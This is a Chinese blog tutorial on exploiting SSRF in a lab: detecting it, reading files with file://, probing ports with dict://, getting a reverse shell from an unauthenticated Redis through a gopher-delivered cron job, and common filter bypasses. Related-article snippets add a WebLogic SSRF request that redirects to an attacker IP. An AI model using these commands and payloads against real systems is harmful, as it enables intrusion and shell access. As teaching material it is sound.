ssrf 过滤.php,SSRF详细利用方式及getshell

最新推荐文章于 2024-04-14 16:57:00 发布
最新推荐文章于 2024-04-14 16:57:00 发布
阅读量521 收藏
点赞数

本文将分为三个部分讲解0x01 ssrf本地远程及其他验证漏洞方式0x02 ssrf利用redis未授权getshell0x03 ssrf常见的绕过方式

0x01 ssrf本地及远程验证方式重新复现一下 顺便复习一下curl和监听端口的命令

无回显的ssrf验证本地开启apache服务

8a478e696cfdc216fc5668f3a39c7553.png

在存在ssrf处访问http://10.1.1.200(本机服务地址)查看kali机器服务器日志信息:

tail -f /var/log/apache2/access.log

327c4e21551c00f3c8faa0f9992f1eff.png

48a0de94051d6d45e55cb29e12e59b8e.png

打开日志发现被访问了,确定存在ssrf漏洞无回显还可以使用burp的collaborator来进行尝试或者dnslog

利用tcpdump测试:

Kali机器打开一个终端,使用tcpdump抓包:

#tcpdump -nne -i eth0 port 6666

-nne:不把端口和网络地址转换成名称,在输出行打印数据链路层的头部信息;-i:监视指定网络接口的数据包。

17da9e5cb9b97f8ee8e35423c6caee6c.png

访问http://10.1.1.200:6666

ec6b672364fe73ae7fa5eb36d78331d8.png

可以看箭头处,成功由本地访问到,确定存在ssrf漏洞

通过dict协议获取服务器端口运行的服务1.本地利用:本机机器中在终端输入:

curl -v 'dict://127.0.0.1:22'

curl:一种命令行工具,作用是发出网络请求,获取数据;curl -v:显示HTTP通信的整个过程,包括端口连接和HTTP request头信息。

fab2e35b975ad2d82a6e5a01dd01410a.png

可以看到ssh版本号为2.0 debian-6版本

2.远程利用:在存在ssrf地方输入

dict://127.0.0.1:22

06e8ea0ee0b827ecfc48bc4441caba43.png

利用技巧:可以通过Burp爆破看对方开启了什么服务

通过file协议访问计算机中的任意文件1.本地利用:在终端输入

curl -v 'file:///etc/passwd'

f3e29435c6e84943584c2bfc09c0fa92.png

2.远程利用:在存在ssrf地方输入

file:///etc/passwd

961ac919eca46f790e5925cc21281c4d.png

sftp及tftp协议在SSRF中的作用

1.sftp代表SSH文件传输协议,通过sftp协议获取SSH相关信息:

Kali机器上输入:nc -lvp 1234

-l:监听入站信息;-p:设置本地主机使用的通信端口;-v:显示指令执行过程。

在存在SSRF处输入:sftp://10.1.1.200:1234,点击‘TEST IT’后查看响应信息:

1da52395387ff28639c9d6ceb8b9893b.png

2.tftp即简单文件传输协议,允许客户端从远程主机获取文件:

Kali机器上输入:nc -lvup 6666

-u:使用UDP传输协议。

在SSRF处输入:tftp://10.1.1.200:6666

点击后查看响应信息:

c2a8bfd0af3edd042efe5d22d40d3311.png

0x02ssrf利用redis未授权getshell

通过gopher协议攻击Redis,如果内网中的Redis存在未授权访问漏洞,当Redis服务以root权限运行时,利用gopher协议攻击内网中的Redis,通过写入定时任务可以实现反弹shell

1.首先开启centos下redis服务

# cd /usr/local/bin

# ./redis-server /root/redis-5.0.4/redis.conf

847eb15ae54c22aeffc1f9159f0c966d.png

2.在kali上开启redis服务

cd /usr/redis/

./redis-server

b5352b2da7f9248071930a1bdb5eb2bb.png

另外开启一个终端,测试启动:./redis-cli ping

fae5bc49952e552eae85bee09d971d6a.png

启动成功

4.在kali机器写一个redis反弹shell的bash脚本:

0fe8f64b261bb183a8c0b109515deeca.png

在Redis的第0个数据库中添加key为1,名为root的定时任务,value字段最后会多一个n是因为echo重定向最后会自带一个换行符,位置为CentOS机器的/var/spool/cron/,10.1.1.200为获取反弹shell的本地IP地址,666为反弹shell的监听端口,可随意设置。

5.Kali机器另外开启一个终端,使用socat进行端口转发,获取Redis攻击的TCP数据包:

# socat -v tcp-listen:2333,fork tcp-connect:127.0.0.1:6379

将本地的2333端口转发到Redis服务器的6379端口,访问本地的2333端口其实是访问Redis服务器的6379端口。

881b5c267cf2e6d7ac4f87c06ce0aa24.png

执行脚本

bash shell.sh 127.0.0.1 2333

获取到数据

9ef149fa838df667831fa32df934b81e.png

6.先将socat获取的数据保存为socat.log文件,利用脚本将数据转换成适配于gopher协议的URL。

7be49cd34e76f7cf1f7480c21a11ed94.png

7.在kali上监听端口

nv -lvvp 666

14367c4c21a47d59aa56341fc89470d0.png

8.攻击CentOS机器的Redis服务:

在SSRF处输入gopher://IP:端口/_payload:

gopher://127.0.0.1:6379/_转换的数据内容:

dea942380c77f6bf4762872288f4063d.png

成功反弹shell

0x03 ssrf常见的绕过方式

IP地址转换进制

添加端口

利用短地址进行302跳转(如192.168.1.1.xip.ip会自动重定向到192.168.1.1)

利用句号

还有很多绕过方式

暂时总结到这里吧

果妈说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1455
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
利用ssrf上传文件到服务器,4.4. SSRF
weixin_34413579的博客
08-02 157
4.4.4. 过滤绕过¶4.4.4.1. 更改IP地址写法¶一些开发者会通过对传过来的URL参数行正则匹配的方式过滤内网IP,如采用如下正则表达式:^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\....
SSRF+Redis未授权getshell
最新发布
yuan_boss的博客
04-14 1069
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
ssrf 过滤.php,[CTFSHOW]SSRF
weixin_33359523的博客
03-22 328
文章目录web351首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件error_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTR...
Weblogic SSRF 到Getshell
干铮的博客
01-29 564
Weblogic SSRF漏洞 描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,而攻击内网redis/fastcgi等脆弱组件。 1.环境搭建 环境采用vulhub的docker环境 启动环境路径 vulhub/weblogic/ssrf 启动环境命令 docker-compose build docker-compose up -d 访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用 2.S..
实战getshell新姿势-SSRF漏洞利用与getshell实战
qq_43665434的博客
03-28 1305
实战getshell新姿势-SSRF漏洞利用与getshell实战 一、什么地方最容易出现SSRF二、SSRF漏洞危害三、SSRF 神器 Curl 的使用 四、最常用的跳转绕过五、Python + SSRF 实现端口扫描1. 简单的端口扫描2. 同时观察 Wireshark 整个扫描流程3. 代码实现4. 验证本地是否开启了相应的端口5. Python 代码编写的思路:端口存在连接会一直在连接,连接时间会很长端口不存在的连接会被立马刷新 六、利用 Discuz 的 SSRF 漏洞 .
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
红蓝对抗中的SSRF深入利用实战.pdf
08-11
安全趋势 概述 SSRF简介 利用现状 利用困境 实战分享 Case 1 Case 2 Case 3
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF02】服务器端请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4017
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell
ssrf 过滤.php,SSRF技巧之如何绕过filter_var( )
weixin_42478292的博客
03-22 409
0x00 前言前几天我读了两篇非常棒的论文:第一篇是发表在blackhat.com上的“A New Era of SSRF ”,讲述的是不同编程语言的SSRF问题;第二篇是由Positive Technology发表的一篇名为“PHP Wrapper” 的论文,它主要讲述的是如何以多种不同的方式使用PHP Wrapper来绕过过滤器以及受过滤的输入(您可以在结尾处找到这两个链接)。在本文中,我将深...
挖洞经验:通过Vimeo的文件上传功能发现其SSRF漏洞
墨痕诉清风的博客
03-09 564
比如,按以上原理,如果我的VPS告诉Vimeo后端服务器,我需要上传的文件有500B,那么Vimeo后端服务器就会来取走这500B,但是,如果现在我的VPS告诉Vimeo后端服务器我的文件只有200B,那么之后会发生什么呢?于是,我就直接想测试一下Vimeo平台的上传功能,尤其是通过Google云端硬盘 (Google Drive)上传到Vimeo的一些功能特性,所以,在我的Google云端硬盘中我选择了一个特定视频文件,把它执行到Vimeo的上传操作,然后用BurpSuite查看它的具体上传请求信息。..
Web渗透测试之SSRF攻击:绕过SSRF过滤
vodkaDL的博客
03-09 2743
文章目录前言 前言
ssrf redis getshell 写私钥_SSRF 漏洞记录
weixin_39752880的博客
11-22 480
0x00:漏洞原理SSRF(Server-Side Request Forgery)也属于应用层上的一个漏洞类型,用一个最简单的例子来理解这个漏洞:比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于这个功能的图片它除了可以让你上传以外,还支持填入远程图片地址,如果你填入了远程的图片地址,则该网站会加载远程图过来行显示,而如果程序写法不严谨或者过滤不严格,则加载图片...
SSRF技巧拓展】————8、微博某处SSRF可GET SHELL
Fly_鹏程万里
01-28 338
看到微博SRC做活动,严重级别漏洞额外奖励5000现金,于是花了接近一晚上找到这个洞。漏洞报告给微博后,由于是微博收到的第一个严重漏洞导致他们运营无法理解漏洞具体危害场景及影响范围,解释一通最终奖励了¥5,000现金和2000积分。 0x01 找切入点 用WebProxy抓到一处URL中带URL的请求:http://zhifu.game.weibo.com/topay.php。 参数中pay...
Didcuz memcache+ssrf GETSHELL漏洞
G00dChina的博客
06-08 1526
漏动来源:阿里云云盾 漏动名称:Didcuz memcache+ssrf GETSHELL漏洞 漏动描述:Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入WEBSHELL恶意代码,从而造成数据库泄漏; 漏动文件:bbs/src/source/function/function_core.php
weblogic ssrf 反弹shell
09-16
### 回答1: WebLogic SSRF 漏洞可以被滥用以执行远程代码,包括反弹 shell。下面是一种可能的方法: 1. 确保你有一台能够监听反弹 shell 的主机,并且已经在等待连接。 2. 使用 SSRF 漏洞向目标 WebLogic 服务器发送 HTTP 请求,以获取访问内部资源的权限。例如,可以使用以下请求: ``` POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1 Host: <目标 WebLogic 服务器> Content-Length: 102 weblogic.userConsoleMode=true&consoleTabId=&redirectPage=&redirectServlet=&logoutTabId=&logoutCancelTabId=&logoutSubmitTabId=&cancelTabId=&startHelpWindow=&returnToHelp=&helpWindowTitle=&helpWindowWidth=&helpWindowHeight=&helpWindowTop=&helpWindowLeft=&helpWindowStatus=&helpWindowScrollbars=&helpWindowResizable=&helpWindowMaximize=&helpWindowUri=h%74tp://<你的 IP 地址>:<监听端口>/ ``` 注意,这个请求将把 WebLogic 控制台重定向到你的主机。当 WebLogic 尝试访问你的主机时,它将尝试连接到你的监听端口,并执行任何发送的命令。 3. 等待连接,并在成功连接后执行任意命令。例如,你可以使用以下命令反弹 shell: ``` nc -lvnp <监听端口> ``` 这将在你的主机上启动一个监听器,等待从目标 WebLogic 服务器返回的反弹 shell。如果成功利用SSRF 漏洞,你应该会在监听器上看到一个 shell。 ### 回答2: WebLogic是一种广泛使用的Java应用服务器,但在某些版本中存在安全漏洞,其中之一是SSRF(Server-Side Request Forgery)漏洞。在此漏洞中,攻击者可以通过构造特定恶意请求,使WebLogic服务器执行非预期的请求。下面我们将讨论如何利用WebLogic SSRF漏洞来反弹shell。 首先,要利用SSRF漏洞,攻击者需要找到WebLogic应用程序中存在这个漏洞的组件。一旦找到漏洞组件,攻击者可以构造一个特定的恶意请求,将目标服务器指向一个恶意的外部URL。 接下来,攻击者需要在恶意URL中包含一个恶意的shell代码。这个shell代码可以是一段PHP、ASP或其他脚本语言,用于在远程服务器上执行命令。 当目标WebLogic服务器接收到恶意请求并执行时,它将访问恶意URL并获取恶意代码。如果成功执行,攻击者就可以在目标服务器上获得shell访问权限,从而可以执行任意命令。 为了使反弹的shell更持久和稳定,攻击者可以持续与目标服务器行交互,并保持shell会话。这样,即使初始的SSRF漏洞请求被修补或检测到,攻击者仍然可以在以后的时间内保持对服务器的控制。 为了防止SSRF漏洞,WebLogic服务器的管理员需要采取一些安全措施。这些措施包括更新到最新的WebLogic版本以修复已知的漏洞,配置严格的访问控制列表,限制对敏感资源的访问,并对来自外部的请求过滤和验证。 总之,利用WebLogic SSRF漏洞反弹shell是一种非法行为,违反了计算机系统的安全和隐私。我们强烈建议所有用户和管理员采取适当的安全措施来保护WebLogic服务器免受此类漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值